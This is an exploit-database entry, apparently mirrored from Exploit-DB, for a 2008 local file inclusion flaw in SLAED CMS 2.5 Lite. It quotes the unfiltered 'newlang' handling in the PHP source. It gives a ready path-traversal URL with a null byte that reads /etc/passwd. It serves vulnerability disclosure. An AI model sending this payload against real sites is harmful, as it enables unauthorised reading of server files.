header-logo
Suggest Exploit
vendor:
SLAED CMS 2.5 Lite
by:
The_HuliGun
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: SLAED CMS 2.5 Lite
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: N/A
CPE: a:slaed:slaed_cms_2.5_lite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SLAED CMS 2.5 Lite Local file inclusion

SLAED CMS 2.5 Lite is vulnerable to Local File Inclusion due to the lack of input validation. The newlang parameter in the index.php file is not filtered, so an attacker can use the exploit http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/passwd%00 to read the /etc/passwd file.

Mitigation:

Input validation should be implemented to prevent Local File Inclusion.
Source

Exploit-DB raw data:

# SLAED CMS 2.5 Lite Local file inclusion

# Script url http://www.slaed.net/uploads/files/public/SLAED_CMS_2.5_Lite.zip

# Lets code in function/sources.php: 
 
780:  // Format language
781:  function get_lang($module="") {
782:	global $multilingual, $currentlang, $language, $user_cookie_t;
783:	if (isset($_REQUEST['newlang']) && $multilingual == "1") {
784:		if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {
785:			setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));
786:			require_once("language/lang-".$_REQUEST['newlang'].".php");
                        ...

And in index.php:
9:    require_once("function/function.php");
10:   get_lang();

# As you can see variable newlang is not filtered, so, if magic_quotes_gpc turned off, we can use exploit:

http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/passwd%00

# Bug discovered by The_HuliGun

# Greetz to: NaTka and all people who understand...

# See u soon!

# milw0rm.com [2008-01-23]